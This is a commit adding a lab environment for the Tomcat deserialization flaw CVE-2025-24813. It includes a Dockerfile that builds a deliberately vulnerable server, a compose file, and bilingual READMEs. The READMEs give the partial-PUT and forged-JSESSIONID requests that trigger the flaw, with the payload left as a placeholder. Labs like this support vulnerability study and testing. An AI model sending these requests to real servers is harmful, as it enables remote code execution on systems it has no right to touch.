first commit

tomcat/CVE-2025-24813/Dockerfile

@@ -0,0 +1,7 @@
+FROM vulhub/tomcat:9.0.97
+
+LABEL maintainer="phithon <root@leavesongs.com>"
+
+RUN set -ex \
+    && sed -i '/<load-on-startup>1<\/load-on-startup>/i \        <init-param>\n            <param-name>readonly</param-name>\n            <param-value>false</param-value>\n        </init-param>' /usr/local/tomcat/conf/web.xml \
+    && sed -i '/<\/Context>/i \    <Manager className="org.apache.catalina.session.PersistentManager">\n        <Store className="org.apache.catalina.session.FileStore"/>\n    </Manager>' /usr/local/tomcat/conf/context.xml

tomcat/CVE-2025-24813/README.md

@@ -0,0 +1,89 @@
+# Tomcat Session Deserialization Remote Code Execution (CVE-2025-24813)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Apache Tomcat is a widely used open-source implementation of the Java Servlet, JavaServer Pages, Java Expression Language, and WebSocket technologies.
+
+A deserialization vulnerability was found in Apache Tomcat from 11.0.0-M1 through 11.0.2, from 10.1.0-M1 through 10.1.34, from 9.0.0.M1 through 9.0.98. It occurs when Tomcat is configured with both writable DefaultServlet (readonly=false) and file-based session persistence. The combination allows attackers to write arbitrary files to the server and trigger deserialization of these files by manipulating the JSESSIONID cookie, ultimately leading to remote code execution.
+
+- <https://lists.apache.org/thread/j5fkjv2k477os90nczf2v9l61fb0kkgq>
+- <https://github.com/charis3306/CVE-2025-24813>
+- <https://forum.butian.net/article/674>
+
+## Environment Setup
+
+Execute the following commands to start a vulnerable Tomcat 9.0.97 server:
+
+```
+docker compose build
+docker compose up -d
+```
+
+After the server starts, you can access the Tomcat example page by visiting `http://your-ip:8080`.
+
+## Vulnerability Reproduction
+
+The vulnerability exists due to two key misconfigurations in Tomcat. First, the DefaultServlet is configured with readonly=false, allowing file uploads:
+
+```xml
+<servlet>
+    <servlet-name>default</servlet-name>
+    <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
+    <init-param>
+        <param-name>debug</param-name>
+        <param-value>0</param-value>
+    </init-param>
+    <init-param>
+        <param-name>listings</param-name>
+        <param-value>false</param-value>
+    </init-param>
+    <init-param>
+        <param-name>readonly</param-name>
+        <param-value>false</param-value>
+    </init-param>
+    <load-on-startup>1</load-on-startup>
+</servlet>
+```
+
+Second, Tomcat is configured to use file-based session persistence.
+
+```xml
+<Manager className="org.apache.catalina.session.PersistentManager">
+    <Store className="org.apache.catalina.session.FileStore"/>
+</Manager>
+```
+
+Both configurations use the same default storage path: `$CATALINA_BASE/work/Catalina/localhost/ROOT`.
+
+When sending a partial PUT request, Tomcat converts path separators (/) in the file path to periods (.) and temporarily stores the file in the session storage directory. By crafting a specific request, we can write a malicious serialized object to this directory.
+
+To exploit this vulnerability, first send a partial PUT request with the Content-Range header to write a file named `.deserialize.session` in the temporary directory (I use the URLDNS gadget for testing purposes):
+
+```
+PUT /deserialize/session HTTP/1.1
+Host: your-ip:8080
+Content-Length: 1234
+Content-Range: bytes 0-5/10
+
+deserialize content
+```
+
+![](1.png)
+
+Then, send another request with a manipulated JSESSIONID cookie to trigger deserialization of the file:
+
+```
+GET / HTTP/1.1
+Host: your-ip:8080
+Cookie: JSESSIONID=.deserialize
+
+
+```
+
+![](2.png)
+
+As you can see, the URLDNS gadget is successfully deserialized, and the DNS request is sent:
+
+![](3.png)
+
+In a real attack scenario, the "deserialize content" would be replaced with a malicious serialized Java object that can execute arbitrary code when deserialized by web applications.

tomcat/CVE-2025-24813/README.zh-cn.md

@@ -0,0 +1,87 @@
+# Tomcat 远程代码执行漏洞（CVE-2025-24813）
+
+Apache Tomcat 是一个广泛使用的开源Java Servlet、JavaServer Pages、Java Expression Language和WebSocket技术的实现。
+
+在 Tomcat 版本 9.x ~ 9.0.97，10.x ~ 10.1.34, 11.x ~ 11.0.2 中，当 Tomcat 同时配置了可写的 DefaultServlet（readonly=false）和基于文件的会话持久化时，攻击者可以向服务器写入任意文件，并通过操作 JSESSIONID cookie 触发这些文件的反序列化，最终导致远程代码执行。
+
+- <https://lists.apache.org/thread/j5fkjv2k477os90nczf2v9l61fb0kkgq>
+- <https://github.com/charis3306/CVE-2025-24813>
+- <https://forum.butian.net/article/674>
+
+## 环境搭建
+
+执行以下命令启动存在漏洞的Tomcat 9.0.97服务器：
+
+```
+docker compose build
+docker compose up -d
+```
+
+服务启动后，访问`http://your-ip:8080`即可看到Tomcat的示例页面。
+
+## 漏洞复现
+
+该漏洞存在的原因是Tomcat中两个关键的错误配置。首先，DefaultServlet配置了readonly=false，允许文件上传：
+
+```xml
+<servlet>
+    <servlet-name>default</servlet-name>
+    <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
+    <init-param>
+        <param-name>debug</param-name>
+        <param-value>0</param-value>
+    </init-param>
+    <init-param>
+        <param-name>listings</param-name>
+        <param-value>false</param-value>
+    </init-param>
+    <init-param>
+        <param-name>readonly</param-name>
+        <param-value>false</param-value>
+    </init-param>
+    <load-on-startup>1</load-on-startup>
+</servlet>
+```
+
+其次，Tomcat配置了基于文件的Session持久化：
+
+```xml
+<Manager className="org.apache.catalina.session.PersistentManager">
+    <Store className="org.apache.catalina.session.FileStore"/>
+</Manager>
+```
+
+这两种配置都使用相同的默认存储路径：`$CATALINA_BASE/work/Catalina/localhost/ROOT`。
+
+当发送不完全的PUT请求（使用`Content-Range`头）时，Tomcat会将文件路径中的分隔符(/)转换为句点(.)，并将文件临时存储在会话存储目录中。利用这个特效，我们可以将恶意序列化对象写入此临时文件中。
+
+要利用此漏洞，首先发送带有Content-Range头的部分PUT请求，在临时目录中写入名为.deserialize.session的文件（这里使用URLDNS gadget进行测试）：
+
+```
+PUT /deserialize/session HTTP/1.1
+Host: your-ip:8080
+Content-Length: 1234
+Content-Range: bytes 0-5/10
+
+deserialize content
+```
+
+![](1.png)
+
+然后，发送另一个带有操作过的JSESSIONID cookie的请求，触发文件的反序列化：
+
+```
+GET / HTTP/1.1
+Host: your-ip:8080
+Cookie: JSESSIONID=.deserialize
+
+
+```
+
+![](2.png)
+
+可见，URLDNS gadget被成功反序列化，并发送了DNS请求：
+
+![](3.png)
+
+在实际攻击场景中，"deserialize content"将被替换为恶意的序列化Java对象，当被目标应用反序列化时可以执行任意代码。

tomcat/CVE-2025-24813/docker-compose.yml

@@ -0,0 +1,5 @@
+services:
+ tomcat:
+   build: .
+   ports:
+    - "8080:8080"